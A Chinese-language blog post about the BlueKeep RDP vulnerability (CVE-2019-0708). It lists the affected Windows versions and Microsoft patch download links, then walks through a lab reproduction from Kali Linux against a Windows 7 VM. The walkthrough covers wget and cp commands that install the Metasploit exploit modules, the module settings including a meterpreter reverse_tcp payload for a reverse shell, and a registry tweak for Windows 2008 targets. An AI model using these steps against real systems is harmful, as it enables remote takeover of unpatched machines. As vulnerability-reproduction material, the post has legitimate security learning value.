漏洞介绍

等了几个月,终于在今年9月7日凌晨有大佬发出了利用脚本EXP。

引用某大佬写的漏洞介绍

Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,Windows2003、Windows2008、Windows2008 R2、Windows XP系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。

这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。

CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。

如果被攻击者利用,会导致服务器入侵,中病毒,像WannaCry 永恒之蓝漏洞一样大规模的感染。

受影响的版本

  • Windows 7

  • Windows Server 2008 R2

  • Windows Server 2008

  • Windows 2003

  • Windows XP

各版本补丁下载

Windows 7、Windows 2008(R2) 微软CVE-2019-0708补丁详情地址:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

1.Windows 7 漏洞补丁系列下载地址

Windows 7 SP1 32位系统:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x86_6f1319c32d5bc4caf2058ae8ff40789ab10bf41b.msu

Windows 7 SP1 64位系统:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu

2.Windows Server 2008 漏洞补丁系列下载地址

Windows Server 2008 32位系统:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499149-x86_832cf179b302b861c83f2a92acc5e2a152405377.msu

Windows Server 2008 x64位系统:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499149-x64_9236b098f7cea864f7638e7d4b77aa8f81f70fd6.msu

Windows Server 2008 R2 Itanium系统:

http://download.windowsupdate.com/c/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-ia64_fabc8e54caa0d31a5abe8a0b347ab4a77aa98c36.msu

Windows Server 2008 R2 x64系统:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu

Windows Server 2008 Itanium:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499180-ia64_805e448d48ab8b1401377ab9845f39e1cae836d4.msu

3.Windows Server 2003 漏洞补丁系列下载地址

Windows Server 2003 32位系统:

http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x86-custom-chs_4892823f525d9d532ed3ae36fc440338d2b46a72.exe

Windows Server 2003 64位系统:

http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-chs_f2f949a9a764ff93ea13095a0aca1fc507320d3c.exe

4.Windows XP 漏洞补丁系列下载地址

Windows XP SP3 32位系统:

http://download.windowsupdate.com/c/csa/csa/secu/2019/04/windowsxp-kb4500331-x86-custom-chs_718543e86e06b08b568826ac13c05f967392238c.exe

Windows XP SP2 64位系统:

http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-enu_e2fd240c402134839cfa22227b11a5ec80ddafcf.exe

Windows XP SP3 for XPe:

http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsxp-kb4500331-x86-embedded-custom-chs_96da48aaa9d9bcfe6cd820f239db2fe96500bfae.exe

实验环境

攻击机:Kali Linux 2019.03版

攻击机IP:192.168.1.12

靶机:Windows 7 SP1(6.1.7601)

靶机IP:192.168.1.10

导入MSF攻击模块

手动下载加入模块

cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploit/windows/rdp/

rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb 替换 /usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb 替换 /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

Kali下载加入模块

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/

cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/

cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/

cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

实验步骤

进入MSF设置选项

大概需要设置三个选项

  • RHOSTS 靶机IP地址

  • Target 攻击选项(使用info命令可以查看到targets)

  • Payloads 攻击载荷(set payload windows/x64/meterpreter/reverse_tcp)

需要注意的地方

使用最多的是 target 2 和 3,1 因为是真实环境,没有测试,2 和 3有时候会蓝屏,亲测但是多试几次可能就能拿到shell,因为补丁可能存在阉割版或者刚发布,所以不太稳定。

还有就是Payloads一定要设置,不设置肯定返回不了shell,命令: set payload windows/x64/meterpreter/reverse_tcp

设置完成后,可查看到Payloads选项。

攻击 Windows 2008(R2) 需要修改注册表 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd\fDisableCam] 值修改为 0

成功获取反弹shell

刚开始我也是不断的蓝屏,死活拿不到shell,但是不停的 run 尝试之后,发现已经获取到shell了。

获取到反弹到的shell

Windows 7 IP地址

复现总结

今天一下午都在复现这个漏洞,期间遇到了很多坑,我换了Kali Linux 2019.03版本,尝试没有出现之前的问题。Windows 2008还没有测试,大家可以自行搭建测试。如果获取不到反弹shell或者蓝屏,那就多试几次,或者换个target的再多试几次。希望大家不会出现玄学问题,祝各位复现一路顺风~